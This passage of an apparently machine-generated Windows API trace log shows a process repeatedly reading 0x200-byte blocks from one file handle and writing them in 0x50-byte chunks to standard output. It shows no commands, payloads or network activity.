lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.324] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.324] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.325] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.325] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.326] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.326] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.327] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.327] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.328] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.328] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.329] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.329] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.330] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.330] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle 